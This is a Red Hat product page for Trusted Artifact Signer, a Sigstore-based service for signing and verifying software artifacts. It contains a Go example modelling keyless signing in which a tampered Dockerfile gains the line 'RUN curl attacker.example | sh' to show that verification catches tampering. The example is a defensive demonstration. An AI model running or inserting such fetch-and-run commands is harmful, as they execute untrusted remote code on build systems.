Red Hat Trusted Artifact Signer
Enables cryptographic signing, verification of software, and provenance metadata.
What is Red Hat Trusted Artifact Signer?
Red Hat Trusted Artifact Signer enhances software supply chain security by simplifying cryptographic signing and verification of software artifacts, such as container images, binaries, and documents. Trusted Artifact Signer provides a production-ready deployment of the Sigstore project in Red Hat Trusted Software Supply Chain.
Enterprises adopting it can meet signing-related criteria for achieving Supply Chain Levels for Software Artifacts (SLSA) compliance and have greater confidence in the security and trustworthiness of their software supply chains.
Red Hat Trusted Artifact Signer is generally available now
Accelerate applications with digital signatures
Ensure authenticity and integrity. Auditable transparency logs, secure signing mechanisms, and signer identity verification increase trust in artifacts and make the software supply chain more transparent and accountable. Cryptographic signing provides integrity, authentication, and non-repudiation of artifacts.
Reduce complexity by eliminating the need to maintain a key management system in order to keep artifacts and containers tamper-free. Identity-based ("keyless") signing through the OpenID Connect (OIDC) integration ties each signature to an authenticated identity from your existing identity provider, so artifacts and containers can be authenticated and verified without long-lived signing keys to distribute, rotate, or protect.
Stay compliant by meeting the signing-related criteria of the Supply Chain Levels for Software Artifacts (SLSA) framework. Provenance is generated automatically as part of the build process in Red Hat Trusted Application Pipeline; Enterprise Contract policies, combined with cryptographic signatures, establish a non-repudiable chain of custody and verify that pipeline runs meet industry requirements such as SLSA.
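A minimal model of the identity-based signing and verification flow described above, written here as an added Go example. It is not Trusted Artifact Signer or Sigstore code: in a real deployment cosign obtains a short-lived certificate for the ephemeral key from Fulcio and records the signature in the Rekor transparency log, neither of which is modelled here, and the issuer URL, subject names and artifact content below are constructed assumptions.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Identity models the OIDC claims that Fulcio binds to an ephemeral signing key
// (in a real Sigstore certificate these live in X.509 extensions / the SAN).
type Identity struct {
	Issuer  string // OIDC issuer URL (assumed value in this example)
	Subject string // e.g. a CI workflow identity or a user e-mail address
}

// SignedArtifact stands in for a Sigstore bundle: the signed digest, the signature,
// the (ephemeral) public key and the identity that key was bound to.
type SignedArtifact struct {
	Digest    [sha256.Size]byte
	Signature []byte
	PublicKey *ecdsa.PublicKey
	Identity  Identity
}

// Policy mirrors cosign's --certificate-oidc-issuer / --certificate-identity:
// only signatures produced under this issuer and subject are accepted.
type Policy struct {
	Issuer  string
	Subject string
}

// SignArtifact models keyless signing: a fresh P-256 key is generated, used once to
// sign the SHA-256 digest of the artifact, and then dropped (only the public key and
// the bound identity are kept), so there is no long-lived key to manage.
func SignArtifact(artifact []byte, id Identity) (*SignedArtifact, error) {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	digest := sha256.Sum256(artifact)
	sig, err := ecdsa.SignASN1(rand.Reader, priv, digest[:])
	if err != nil {
		return nil, err
	}
	return &SignedArtifact{
		Digest:    digest,
		Signature: sig,
		PublicKey: &priv.PublicKey,
		Identity:  id,
	}, nil
}

// Verify runs the three checks a verifier performs, in order: integrity (the artifact
// still hashes to the signed digest), authenticity (the signature validates under the
// key bound to the signer) and identity (that signer is one the policy trusts).
// It returns nil only when all three pass.
func Verify(artifact []byte, sa *SignedArtifact, p Policy) error {
	digest := sha256.Sum256(artifact)
	if digest != sa.Digest {
		return errors.New("integrity: artifact digest does not match the signed digest")
	}
	if !ecdsa.VerifyASN1(sa.PublicKey, digest[:], sa.Signature) {
		return errors.New("authenticity: signature does not verify under the bound key")
	}
	if sa.Identity.Issuer != p.Issuer || sa.Identity.Subject != p.Subject {
		return fmt.Errorf("identity: signer %q from issuer %q is not allowed by policy",
			sa.Identity.Subject, sa.Identity.Issuer)
	}
	return nil
}

func main() {
	// Constructed sample artifact and identities; the issuer URL is an assumption.
	artifact := []byte("FROM registry.example/base:1.0\nRUN make build\n")
	trusted := Identity{Issuer: "https://oidc.example/auth", Subject: "build-pipeline@example.com"}
	policy := Policy{Issuer: trusted.Issuer, Subject: trusted.Subject}

	good, _ := SignArtifact(artifact, trusted)
	fmt.Println("genuine build:", Verify(artifact, good, policy))

	// An attacker modifies the artifact: the original signature no longer matches.
	tampered := append([]byte{}, artifact...)
	tampered = append(tampered, []byte("RUN curl attacker.example | sh\n")...)
	fmt.Println("tampered, original signature:", Verify(tampered, good, policy))

	// The attacker re-signs the tampered artifact under their own identity: integrity
	// and signature checks pass, and only the identity check rejects it.
	forged, _ := SignArtifact(tampered, Identity{Issuer: trusted.Issuer, Subject: "attacker@example.com"})
	fmt.Println("tampered, attacker signature:", Verify(tampered, forged, policy))
}
```

The third case is the reason a verifier must pin the expected issuer and identity rather than accept any valid signature: with keyless signing anyone who can authenticate to the OIDC issuer can produce a signature that is cryptographically valid, so the policy, not the mere presence of a signature, is what carries the trust decision.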
Integrations
Trusted Artifact Signer is a production-ready deployment of the Sigstore project within an enterprise. Sigstore has seen rapid adoption in the open source community: package ecosystems such as npm, PyPI, and Maven are adopting Sigstore to attest the packages published within each ecosystem, and it has become the de facto signing system for containers, with Kubernetes having standardized on Sigstore for its release artifacts. Multiple Red Hat products have adopted or are integrating Sigstore, including Podman, Quay, Ansible, Red Hat Advanced Cluster Security (ACS), StoneSoup / HACBS, and Red Hat Trusted Content.
Featured products
Red Hat Trusted Profile Analyzer
Use your software assets with confidence. Curate your trusted content by...
Red Hat Trusted Software Supply Chain
Consistently code, build, and monitor for a trusted software supply chain...
Red Hat Trusted Application Pipeline
Catch vulnerabilities early with a self-serve developer experience imbued...
Red Hat Developer Hub
An enterprise-grade, open developer platform for building developer portals,...
Featured resources
A developer’s guide to setting supply chain security in DevSecOps
White paper: Tackling CI/CD Security Anti-Patterns
Analyst brief: Getting started with CI/CD Pipeline Security
A blueprint for supply chain security
Latest blogs & articles
Establishing software supply chain security: Jenkins with Red Hat Trusted Artifact...
As cyber threats become increasingly sophisticated, organizations need...
Red Hat Trusted Application Pipeline - 1.0.2 Maintenance Release
1.0.2 Maintenance Release Announcement In case you were wondering why...
Red Hat Trusted Software Supply Chain is now available
Discover how Red Hat Trusted Software Supply Chain makes it easier to create,...
An introduction to Red Hat Trusted Application Pipeline
Discover more about Red Hat Trusted Application Pipeline, a secure and easy...